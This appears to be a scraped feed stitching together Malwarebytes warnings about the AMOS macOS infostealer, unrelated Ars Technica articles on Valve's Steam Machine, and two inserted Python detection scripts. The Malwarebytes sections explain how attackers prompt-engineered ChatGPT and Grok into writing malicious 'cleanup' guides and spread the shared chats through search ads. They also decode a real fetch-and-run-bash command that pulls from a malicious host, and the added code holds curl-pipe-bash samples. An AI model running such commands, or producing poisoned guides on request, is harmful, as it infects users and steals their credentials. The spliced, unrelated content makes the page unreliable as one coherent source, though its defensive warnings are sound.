
Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer

12 December 2025 at 09:26

Researchers have found evidence that AI conversations were inserted into Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations that provided clearly laid-out instructions to run a command in the macOS Terminal. That command ended with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user never gets a chance to see or assess what the downloaded script will do before it runs. And because the script is fetched and executed from the command line, it sidesteps the normal protections that apply to downloaded files and can execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

[Image: a sponsored ad for ChatGPT Atlas that looks very real. Image courtesy of Kaspersky]

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

  • First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware that we recommend skipping them or making sure you never see them. At best they cost the company you looked for money, and at worst you fall prey to imposters.
  • If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.
  • Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

SteamOS tested on dedicated GPUs: No, it’s not always faster than Windows

5 December 2025 at 12:29

I wrote a couple of weeks ago about my personal homebrew Steam Machine, a self-built desktop under my TV featuring an AMD Ryzen 7 8700G processor and a Radeon 780M integrated GPU. I wouldn’t recommend making your own version of this build, especially with RAM prices as they currently are, but there are all kinds of inexpensive mini PCs on Amazon with the same GPU, and they’ll all be pretty good at playing the kinds of games that already run well on the less-powerful Steam Deck.

But this kind of hardware is an imperfect proxy for the Steam Machine that Valve plans to launch sometime next year—that box will include a dedicated GPU with 8GB of dedicated video memory, presenting both benefits and possible pitfalls compared to a system with an integrated GPU.

As a last pre-Steam Machine follow-up to our coverage so far, we’ve run tests on several games we test regularly in our GPU reviews to get a sense of how current versions of SteamOS stack up to Windows running on the same hardware. What we’ve found so far is basically the inverse of what we found when comparing handhelds: Windows usually has an edge on SteamOS’s performance, and sometimes that gap is quite large. And SteamOS also exacerbates problems with 8GB GPUs, hitting apparent RAM limits in more games and at lower resolutions compared to Windows.


© Andrew Cunningham

Why won’t Steam Machine support HDMI 2.1? Digging in on the display standard drama.

4 December 2025 at 14:53

When Valve announced its upcoming Steam Machine hardware last month, some eagle-eyed gamers may have been surprised to see that the official spec sheet lists support for HDMI 2.0 output, rather than the updated, higher-bandwidth HDMI 2.1 standard introduced in 2017. Now, Valve tells Ars that, while the hardware itself actually supports HDMI 2.1, the company is struggling to offer full support for that standard due to Linux drivers that are “still a work-in-progress on the software side.”

As we noted last year, the HDMI Forum (which manages the official specifications for HDMI standards) has officially blocked any open source implementation of HDMI 2.1. That means the open source AMD drivers used by SteamOS can’t fully implement certain features that are specific to the updated output standard.

“At this time an open source HDMI 2.1 implementation is not possible without running afoul of the HDMI Forum requirements,” AMD engineer Alex Deucher said at the time.


© Valve

Testing shows why the Steam Machine’s 8GB of graphics RAM could be a problem

2 December 2025 at 14:26

By Valve’s admission, its upcoming Steam Machine desktop isn’t swinging for the fences with its graphical performance. The specs promise decent 1080p-to-1440p performance in most games, with 4K occasionally reachable with assistance from FSR upscaling—about what you’d expect from a box with a modern midrange graphics card in it.

But there’s one spec that has caused some concern among Ars staffers and others with their eyes on the Steam Machine: The GPU comes with just 8GB of dedicated graphics RAM, an amount that is steadily becoming more of a bottleneck for midrange GPUs like AMD’s Radeon RX 7060 and 9060, or Nvidia’s GeForce RTX 4060 or 5060.

In our reviews of these GPUs, we’ve already run into some games where the RAM ceiling limits performance in Windows, especially at 1440p. But we’ve been doing more extensive testing of various GPUs with SteamOS, and we can confirm that in current betas, 8GB GPUs struggle even more on SteamOS than they do running the same games at the same settings in Windows 11.


© Andrew Cunningham

I’ve already been using a “Steam Machine” for months, and I think it’s great

17 November 2025 at 07:00

Valve’s second big foray into first-party PC hardware isn’t a sequel to the much-imitated Steam Deck portable, but rather a desktop computer called the Steam Machine. And while it could go on your desk, Valve clearly intends for it to fit in an entertainment center under a TV—next to, or perhaps even instead of, a game console like the Xbox or PlayStation 5.

I am pretty sure this idea could work, and it’s because I’ve already been experimenting with what is essentially a “Steam Machine” underneath my own TV for months, starting in May when Valve began making it possible to install SteamOS on certain kinds of generic PC hardware.

Depending on what it costs—and we can only guess what it will cost—the Steam Machine could be a good fit for people who just want to plug a more powerful version of the Steam Deck experience into their TVs. But for people who like tinkering or who, like me, have been messing with miniature TV-connecting gaming PCs for years and are simply tired of trying to make Windows workable, the future promised by the Steam Machine is already here.


© Andrew Cunningham

Steam Deck minus the screen: Valve announces new Steam Machine, Controller hardware

12 November 2025 at 13:00

Nearly four years after the Steam Deck changed the world of portable gaming, Valve is getting ready to release SteamOS-powered hardware designed for the living room TV, or even as a desktop PC gaming replacement. The simply named Steam Machine and Steam Controller, both planned to ship in early 2026, are “optimized for gaming on Steam and designed for players to get even more out of their Steam Library,” Valve said in a press release.

A Steam Machine spec sheet shared by Valve lists a “semi-custom” six-core AMD Zen 4 CPU clocked at up to 4.8 GHz alongside an AMD RDNA3 GPU with 28 compute units. The motherboard will include 16GB of DDR5 RAM and an additional 8GB of dedicated DDR6 VRAM for the GPU. The new hardware will come in two configurations with 512GB or 2TB of unspecified “SSD storage,” though Valve isn’t sharing pricing for either just yet.

[Image: If you squint, you can make out a few ports on this unmarked black square. Credit: Valve]
[Image: A strip of LEDs adds a touch of color to the front face of the Steam Machine.]
[Image: I’m a fan of the big fan. Credit: Valve]

Those chips and numbers suggest the Steam Machine will have roughly the same horsepower as a mid-range desktop gaming PC from a few years back. But Valve says its “Machine”—which it ranks as “over 6x more powerful than the Steam Deck”—is powerful enough to support ray-tracing and/or 4K, 60 fps gaming using FSR upscaling.


© Valve

New project brings strong Linux compatibility to more classic Windows games

10 November 2025 at 13:09

For years now, Valve has been slowly improving the capabilities of the Proton compatibility layer that lets thousands of Windows games work seamlessly on the Linux-based SteamOS. But Valve’s Windows-to-Linux compatibility layer generally only extends back to games written for Direct3D 8, the proprietary Windows graphics API Microsoft released in late 2000.

Now, a new open source project is seeking to extend Linux interoperability further back into PC gaming history. The d7vk project describes itself as “a Vulkan-based translation layer for Direct3D 7 [D3D7], which allows running 3D applications on Linux using Wine.”

More options are always welcome

The new project isn’t the first attempt to get Direct3D 7 games running on Linux. Wine’s own built-in WineD3D compatibility layer has supported D3D7 in some form or another for at least two decades now. But the new d7vk project instead branches off the existing dxvk compatibility layer, which is already used by Valve’s Proton for SteamOS and which reportedly offers better performance than WineD3D on many games.


© Arkane Studios

Fake Malwarebytes, LastPass, and others on GitHub serve malware

23 September 2025 at 17:15

Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Unfortunately, Malwarebytes for Mac is one of them.

Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.

In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.

The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.

But in other, less obvious cases, you may see search results like these:

[Image: Search results for “Malwarebytes Github MacOS”]

These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.

The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.

[Image: Fake Malwarebytes GitHub page]

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

[Image: Download and install instructions for the fake software]

The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.

[Image: Blocked by Browser Guard due to a risky pattern]

Here’s a technical breakdown of the instructions provided to the visitor:

  • /bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
  • The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
  • $(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d): here echo ... | base64 -d decodes the long string.
  • curl -fsSL is a command to download data from the web. The options mean:
    • -f: Fail silently for HTTP errors.
    • -s: Silent mode (no progress bar).
    • -S: Show errors if -s is used.
    • -L: Follow redirects.

So, putting all this together:

The inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh

The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.

This is dangerous for the user on many levels. Because there is no prompt or review, the user never gets a chance to see or assess what the downloaded script will do before it runs. And because the script is fetched and executed from the command line, it sidesteps the normal protections that apply to downloaded files and can execute anything the attacker wants.
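To show what the breakdown above (and the first-stage description in the poisoned AI-chat story earlier on this page) amounts to from the defender’s side, here is an added Python example; it is not code from the Malwarebytes articles. It expands the $(echo … | base64 -d) layer the way the shell would, records any URL it recovers in defanged form so the output can go straight into a ticket, and rates the command on the fetch-and-execute patterns this page describes (a subshell around curl, a pipe into bash, base64 decoding, bash -c). The sample commands, the example.invalid domain and the risk thresholds are constructed for this example.

```python
import base64
import re
from dataclasses import dataclass, field

# Shell fragments that fetch a payload and hand it straight to an interpreter,
# so nothing lands on disk where the user could look at it first.
INDICATORS = {
    "pipe_to_shell": re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b"),
    "subshell_fetch": re.compile(r"\$\(\s*(?:curl|wget)\b"),
    "base64_decode": re.compile(r"base64\s+(?:-d|-D|--decode)\b"),
    "shell_dash_c": re.compile(r"(?:^|\s|/)(?:ba|z)?sh\s+-c\b"),
}
# The exact obfuscation layer from the breakdown: $(echo <base64> | base64 -d)
ECHO_B64 = re.compile(r"\$\(\s*echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|-D|--decode)\s*\)")
# Any long run of base64 alphabet characters is worth a decode attempt.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"""(https?)://([^\s/)"']+)""")


@dataclass
class Finding:
    indicators: list = field(default_factory=list)
    decoded: list = field(default_factory=list)   # defanged text recovered from base64
    effective: str = ""                           # command with the echo|base64 layer expanded
    risk: str = "low"


def defang(text):
    """Rewrite URLs as https[:]//host[.]tld so they are not clickable in reports."""
    return URL.sub(lambda m: f"{m.group(1)}[:]//{m.group(2).replace('.', '[.]')}", text)


def try_decode(token):
    """Return the decoded text if `token` is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:          # binascii.Error is a ValueError: bad alphabet or padding
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None


def analyze_command(cmd):
    """Expand the obfuscation layer and score the fetch-and-execute patterns in `cmd`."""
    f = Finding()
    f.indicators = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    # Expand $(echo X | base64 -d) first, exactly as the shell would before running it.
    f.effective = ECHO_B64.sub(lambda m: defang(try_decode(m.group(1)) or m.group(0)), cmd)
    for tok in B64_TOKEN.findall(cmd):
        text = try_decode(tok)
        if text is not None:
            f.decoded.append(defang(text))
    fetches_and_runs = "pipe_to_shell" in f.indicators or "subshell_fetch" in f.indicators
    hides_url = any("://" in d for d in f.decoded)
    if fetches_and_runs:
        f.risk = "high"
    elif hides_url or f.indicators:
        f.risk = "medium"
    return f


# Constructed samples (not real campaign strings): the same shape as the command
# dissected above, a plain curl-pipe-bash one-liner, and a harmless directory listing.
SAMPLE_B64 = base64.b64encode(b"https://example.invalid/hun/install.sh").decode()
SAMPLE_OBFUSCATED = f'/bin/bash -c "$(curl -fsSL $(echo {SAMPLE_B64} | base64 -d))"'
SAMPLE_PIPE = "curl -fsSL https://example.invalid/x.sh | bash"
SAMPLE_BENIGN = "ls -la ~/Library/LaunchAgents"

if __name__ == "__main__":
    for cmd in (SAMPLE_OBFUSCATED, SAMPLE_PIPE, SAMPLE_BENIGN):
        f = analyze_command(cmd)
        print(f"[{f.risk.upper():6}] {cmd}")
        print(f"         effective: {f.effective}")
        print(f"         indicators: {f.indicators}  decoded: {f.decoded}")
```

The `effective` field reproduces the “inner command turns into” step from the breakdown, with the recovered host defanged; the `risk` field is deliberately conservative, treating any pipe-into-shell or subshell-around-curl as high regardless of whether the URL was hidden, since the danger the article describes is the unreviewed execution, not the encoding.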

The files to download have already been taken down, but users who recognize this infection chain are advised to thoroughly check their machines for an infection.

Impersonated software besides Malwarebytes and LastPass included:

  • 1Password
  • ActiveCampaign
  • After Effects
  • Audacity
  • Auphonic
  • Basecamp
  • BetterSnapTool
  • Biteable
  • Bitpanda
  • Bitsgap
  • Blog2Social
  • Blue Wallet
  • Bonkbot
  • Carbon Copy Cloner
  • Charles Schwab
  • Citibank
  • CMC Markets
  • Confluence
  • Coolors
  • DaVinci Resolve
  • DefiLlama
  • Desktop Clockology
  • Desygner
  • Docker
  • Dropbox
  • E-TRADE
  • EigenLayer
  • Fidelity
  • Fliki
  • Freqtrade Bot
  • Freshworks
  • Gemini
  • GMGN AI
  • Gunbot
  • Hemingway Editor
  • HeyGen
  • Hootsuite
  • HTX
  • Hypertracker
  • IRS
  • KeyBank
  • Lightstream
  • Loopback
  • Maestro Bot
  • Melon
  • Metatrader 5
  • Metricool
  • Mixpanel
  • Mp3tag
  • Mural
  • NFT Creator
  • NotchNook
  • Notion
  • Obsidian
  • Onlypult
  • Pendle Finance
  • Pepperstone
  • Pipedrive
  • Plus500
  • Privnote
  • ProWritingAid
  • Publer
  • Raycast
  • Reaper
  • RecurPost
  • Renderforest
  • Rippling
  • Riverside.fm
  • Robinhood
  • Rug AI
  • Sage Intacct
  • Salesloft
  • SentinelOne
  • Shippo
  • Shopify
  • SocialPilot
  • Soundtrap
  • StreamYard
  • SurferSEO
  • Thunderbird
  • TweetDeck
  • Uphold
  • Veeva CRM
  • Viraltag
  • VSCO
  • Vyond
  • Webull
  • Xai Games
  • XSplit
  • Zealy
  • Zencastr
  • Zenefits
  • Zotero

But it’s highly likely that there will be more, so don’t see this as an exhaustive list.

How to stay safe

Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:

  • Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
  • Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
  • Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.

If you have scanned your Mac and found the information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
  • If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.
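The first cleanup step in both articles on this page is to look through the launchd folders for suspicious LaunchAgents and LaunchDaemons. Here is an added Python example of that check; it is not Malwarebytes’ code or a detection from their products. It assumes the three standard macOS launchd locations (~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons), reads each plist with the standard library, and flags items whose command line fetches from the network, decodes base64, pipes into a shell or runs from a temp folder, as well as RunAtLoad items that changed recently. The two plists it writes into a temporary folder are constructed for the demonstration; the heuristics and thresholds are assumptions, so treat a flag as a reason to look, not a verdict.

```python
import os
import plistlib
import re
import tempfile
import time
from pathlib import Path

# Standard launchd folders named in the cleanup steps: user agents plus the two system-level ones.
DEFAULT_DIRS = [
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]

# Traits common in infostealer persistence and rare in legitimate launch items (assumed heuristics).
SUSPICIOUS_PATTERNS = [
    ("fetches from the network", re.compile(r"\b(?:curl|wget)\b")),
    ("decodes base64", re.compile(r"\bbase64\b")),
    ("pipes into a shell", re.compile(r"\|\s*(?:ba|z)?sh\b")),
    ("runs an inline shell string", re.compile(r"\b(?:ba|z)?sh\s+-c\b")),
    ("runs AppleScript", re.compile(r"\bosascript\b")),
    ("runs from a temp or cache folder", re.compile(r"/(?:private/)?(?:tmp|var/tmp)/|/\.cache/")),
]


def inspect_plist(path, now=None, recent_days=30):
    """Describe one launchd plist and list the reasons (if any) it deserves a closer look."""
    path = Path(path)
    now = time.time() if now is None else now
    item = {"path": str(path), "label": None, "command": "", "run_at_load": False,
            "age_days": round((now - path.stat().st_mtime) / 86400, 1), "reasons": []}
    try:
        with open(path, "rb") as fh:
            data = plistlib.load(fh)          # handles both XML and binary plists
    except Exception as exc:                  # not a readable plist: unusual enough to flag
        item["reasons"].append(f"unparseable plist ({type(exc).__name__})")
        return item
    item["label"] = data.get("Label")
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    item["command"] = " ".join(str(a) for a in args)
    item["run_at_load"] = bool(data.get("RunAtLoad", False))
    for reason, rx in SUSPICIOUS_PATTERNS:
        if rx.search(item["command"]):
            item["reasons"].append(reason)
    if item["run_at_load"] and item["age_days"] <= recent_days:
        item["reasons"].append(f"RunAtLoad item changed within the last {recent_days} days")
    if item["label"] and path.stem != item["label"]:
        item["reasons"].append("file name does not match Label")
    return item


def audit_launch_items(dirs=None, now=None, recent_days=30):
    """Walk the launchd folders and return their items, most suspicious first."""
    results = []
    for d in (dirs or DEFAULT_DIRS):
        d = Path(d)
        if d.is_dir():
            for p in sorted(d.glob("*.plist")):
                results.append(inspect_plist(p, now=now, recent_days=recent_days))
    results.sort(key=lambda r: len(r["reasons"]), reverse=True)
    return results


def write_constructed_fixture(folder):
    """Write two constructed plists (not real samples) so the audit can be exercised offline."""
    folder = Path(folder)
    samples = {
        # A plausible agent that has sat unchanged for months.
        "com.example.backup": ({"Label": "com.example.backup",
                                "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
                                "RunAtLoad": True}, 90),
        # A freshly written agent that re-runs a fetch-and-pipe-to-bash one-liner at every login.
        "com.example.helper": ({"Label": "com.example.helper",
                                "ProgramArguments": ["/bin/bash", "-c",
                                                     "curl -fsSL https://example.invalid/p.sh | bash"],
                                "RunAtLoad": True}, 0),
    }
    for name, (data, age_days) in samples.items():
        p = folder / f"{name}.plist"
        with open(p, "wb") as fh:
            plistlib.dump(data, fh)
        stamp = time.time() - age_days * 86400   # back-date the file to simulate its age
        os.utime(p, (stamp, stamp))


def demo():
    """Run the audit against the constructed fixture in a temporary folder and return the results."""
    with tempfile.TemporaryDirectory() as tmp:
        write_constructed_fixture(tmp)
        return audit_launch_items([tmp])


if __name__ == "__main__":
    for item in demo():   # replace demo() with audit_launch_items() to check a real Mac
        flag = "SUSPECT" if item["reasons"] else "ok"
        print(f"[{flag}] {item['path']} age={item['age_days']}d {item['command']}")
        for r in item["reasons"]:
            print("        -", r)
```

Run it as-is to see the constructed fixture scored, or call `audit_launch_items()` with no arguments on the affected Mac; anything flagged should be read alongside the “Remove any suspicious login items” step above, and a plist that the script cannot parse at all is worth opening by hand before deciding.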

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
